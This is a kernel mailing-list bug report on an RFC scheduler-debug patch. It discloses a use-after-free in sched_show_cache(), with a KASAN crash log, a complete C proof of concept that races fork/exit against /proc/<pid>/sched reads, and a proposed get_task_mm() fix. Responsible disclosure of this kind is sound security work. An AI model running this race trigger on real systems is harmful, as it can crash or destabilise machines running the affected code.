Re: [RFC PATCH 8/8] sched/debug: Print task preferred LLC for scheduler debugging

From: XIAO WU

Date: Sun Jun 28 2026 - 15:29:43 EST

Hi Jianyong,

I came across the Sashiko AI review of this series and reproduced the
use-after-free it flagged in sched_show_cache() — a KASAN
slab-use-after-free triggers when reading /proc/<pid>/sched while the
target task is concurrently exiting.

The Sashiko review is at:
https://sashiko.dev/#/patchset/20260625030759.25928-1-wujianyong@xxxxxxxx

> +static void sched_show_cache(struct task_struct *p, struct seq_file *m)
> +{
> +#ifdef CONFIG_SCHED_CACHE
> + struct mm_struct *mm = p->mm;
> + int sc_cpu, sc_llc, sc_node, pref_llc, pref_node;
> +
> + if (!mm)
> + return;
> +
> + sc_cpu = READ_ONCE(mm->sc_stat.cpu);

This saves p->mm into a local variable and checks it for NULL, but
does so without holding task_lock(p) or taking a reference via
get_task_mm(). If the target task is concurrently exiting,
exit_mm() can drop the final reference and free the mm_struct
between the NULL check and the READ_ONCE(mm->sc_stat.cpu) access,
resulting in a slab-use-after-free.

The access happens from proc_sched_show_task() which is reachable
via /proc/<pid>/sched — userspace can trigger this for any visible
task by simply reading the proc file while the task exits.

=== Reproduction ===

Kernel: 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
Arch: x86_64 (QEMU Standard PC Q35 + ICH9, 2009)
Config: CONFIG_KASAN=y, CONFIG_SCHED_CACHE=y

Trigger: race fork/exit against /proc/<pid>/sched reads. 16 worker
processes each fork children in a loop and read /proc/<child_pid>/sched
while the child immediately exits.

=== Crash Log ===

[ 991.032119][T535366] BUG: KASAN: slab-use-after-free in proc_sched_show_task+0x30c7/0x3470
[ 991.032971][T535366] Read of size 4 at addr ffff88802fe0d960 by task poc/535366
[ 991.033952][T535366] CPU: 1 UID: 0 PID: 535366 Comm: poc Not tainted 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
[ 991.033962][T535366] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009)
[ 991.033967][T535366] Call Trace:
[ 991.033970][T535366] <TASK>
[ 991.033973][T535366] dump_stack_lvl+0x116/0x1f0
[ 991.033989][T535366] print_report+0xf4/0x600
[ 991.034021][T535366] kasan_report+0xe0/0x110
[ 991.034032][T535366] ? proc_sched_show_task+0x30c7/0x3470
[ 991.034043][T535366] proc_sched_show_task+0x30c7/0x3470
[ 991.034054][T535366] sched_show+0xf4/0x1b0
[ 991.034062][T535366] seq_read_iter+0x513/0x12d0
[ 991.034074][T535366] seq_read+0x3b1/0x590
[ 991.034093][T535366] vfs_read+0x1e9/0xd00
[ 991.034153][T535366] ksys_read+0x12f/0x250
[ 991.034220][T535366] do_syscall_64+0x129/0x880
[ 991.034240][T535366] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 991.034250][T535366] </TASK>

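The 4-byte read at an offset into a freed mm_struct matches the
READ_ONCE(mm->sc_stat.cpu) access racing against exit_mm().
sched_show_cache() itself does not appear in the trace, presumably
because it was inlined into proc_sched_show_task().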

=== PoC ===

Build: gcc -o poc poc.c -static
Run: ./poc

/* sched_show_cache UAF PoC: race fork/exit against /proc/<pid>/sched */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>

static void worker(void)
{
    char buf[64], path[64];

    for (int i = 0; i < 50000000; i++) {
        pid_t pid = fork();

        /* Child exits at once so exit_mm() races with the read below. */
        if (pid == 0) { _exit(0); }
        if (pid > 0) {
            snprintf(path, sizeof(path), "/proc/%d/sched", pid);
            int fd = open(path, O_RDONLY);
            /* One short read is enough to run the seq_file show callback. */
            if (fd >= 0) { read(fd, buf, 63); close(fd); }
        }
    }
    _exit(0);
}

int main(void)
{
    /* Ignore SIGCHLD so exited children are reaped automatically. */
    signal(SIGCHLD, SIG_IGN);
    for (int i = 0; i < 16; i++)
        if (fork() == 0) { worker(); }
    /* Returns -1 (ECHILD) once every worker has exited. */
    while (wait(NULL) > 0);
    return 0;
}

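A possible fix is to replace the bare p->mm load with get_task_mm(p)
and call mmput(mm) once the sc_stat fields have been read.
get_task_mm() takes task_lock(p) and bumps mm_users, so the mm_struct
stays pinned for the duration of the read. It returns NULL for kernel
threads and for tasks that have already dropped their mm, so the
existing NULL check still applies.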
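
To illustrate why pinning closes the window, here is a small userspace
model of the get_task_mm() / mmput() pattern. It is only a sketch:
fake_mm, fake_task, fake_get_task_mm(), fake_mmput(), fake_exit_mm()
and pinned_read_demo() are hypothetical stand-ins I made up for this
mail, not kernel code, and the model leaves out details such as the
PF_KTHREAD check. The demo replays the problematic interleaving
deterministically in a single thread: the "exit" runs between the pin
and the read.

```c
/* Userspace model only: all fake_* names are hypothetical, not kernel APIs. */
#include <pthread.h>
#include <stdatomic.h>
#include <stdlib.h>

struct fake_mm {
    atomic_int users;       /* models mm->mm_users */
    int sc_cpu;             /* models mm->sc_stat.cpu */
};

struct fake_task {
    pthread_mutex_t lock;   /* models task_lock(p) */
    struct fake_mm *mm;     /* models p->mm */
};

static atomic_int mm_frees; /* counts frees so the demo can observe them */

/* Drop one reference and free on the last one (models mmput()). */
static void fake_mmput(struct fake_mm *mm)
{
    if (atomic_fetch_sub(&mm->users, 1) == 1) {
        free(mm);
        atomic_fetch_add(&mm_frees, 1);
    }
}

/* Load the pointer and take a reference under the lock (models get_task_mm()). */
static struct fake_mm *fake_get_task_mm(struct fake_task *t)
{
    pthread_mutex_lock(&t->lock);
    struct fake_mm *mm = t->mm;
    if (mm)
        atomic_fetch_add(&mm->users, 1);
    pthread_mutex_unlock(&t->lock);
    return mm;
}

/* Detach the mm under the lock, then drop the task's own reference
 * (models the relevant part of exit_mm()). */
static void fake_exit_mm(struct fake_task *t)
{
    pthread_mutex_lock(&t->lock);
    struct fake_mm *mm = t->mm;
    t->mm = NULL;
    pthread_mutex_unlock(&t->lock);
    if (mm)
        fake_mmput(mm);
}

/* Replay the racy ordering with the reader pinned.
 * Returns the value read, or -1 if anything went wrong. */
static int pinned_read_demo(void)
{
    struct fake_task t = { .lock = PTHREAD_MUTEX_INITIALIZER, .mm = NULL };
    int frees_before = atomic_load(&mm_frees);

    t.mm = malloc(sizeof(*t.mm));
    if (!t.mm)
        return -1;
    atomic_init(&t.mm->users, 1);   /* the task's own reference */
    t.mm->sc_cpu = 3;

    struct fake_mm *mm = fake_get_task_mm(&t);  /* reader pins: users == 2 */
    if (!mm)
        return -1;

    fake_exit_mm(&t);               /* task exits: users == 1, not freed */
    int freed_while_pinned = atomic_load(&mm_frees) - frees_before;

    int cpu = mm->sc_cpu;           /* safe: the reader still holds a reference */
    fake_mmput(mm);                 /* last reference: freed here */

    int freed_total = atomic_load(&mm_frees) - frees_before;
    return (freed_while_pinned == 0 && freed_total == 1) ? cpu : -1;
}
```

In this model the free is deferred until the reader drops its
reference, whereas a bare load of t->mm without the lock and the
reference would leave the reader holding a dangling pointer after
fake_exit_mm() returns.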

Thanks,
Xiao